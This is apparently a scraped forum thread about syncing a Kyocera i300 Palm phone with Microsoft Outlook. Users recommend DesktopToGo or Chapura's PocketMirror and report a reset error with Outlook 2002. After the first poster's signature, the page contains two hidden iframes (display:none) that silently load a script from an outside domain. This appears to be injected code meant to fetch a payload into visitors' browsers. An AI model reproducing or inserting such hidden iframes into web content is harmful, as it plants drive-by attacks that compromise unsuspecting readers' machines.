+ Reply to Thread

Sync'ing with outlook??

A friend of mine just picked up an I300, and wants to sync with outlook on a windoze machine instead of palm desktop, what software does he need download and where? any specifics on how to do this?

thanks!

Brooks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use DesktopToGo to sync my palm with Outlook. It allows many synch options.

dee
    oh, you're supposed to READ the manual....

The phone should have included a disk that had the Palm Desktop software as well as another install called PocketMirror by a company called Chapura (www.chapura.com).

PocketMirror gives the PalmDesktop synch program what it needs to synch with Outlook (which includes the Address book, Calendar, To Do list (outlook tasks), and Notes.

-Seth

Does anyone have a link for desktop to go?
    carl

I have been using DTG for years, and now with the i300, with no problem.

DTG vs. Pocketmirror

What are the differences between DTG and PocketMirror? I've deployed pocketmirror to all my users (We used Intellisync before... it's evil). This is the first I've heard about DesktopToGo.

Also, everytime I hotsync my I300 with Outlook 2002, it says the device needs to be reset... Anyone else seen this? Very discouraging!

-john

The synching options are much more robust in DTG. Check out the demo (full functioning) and see if you don't agree.

dee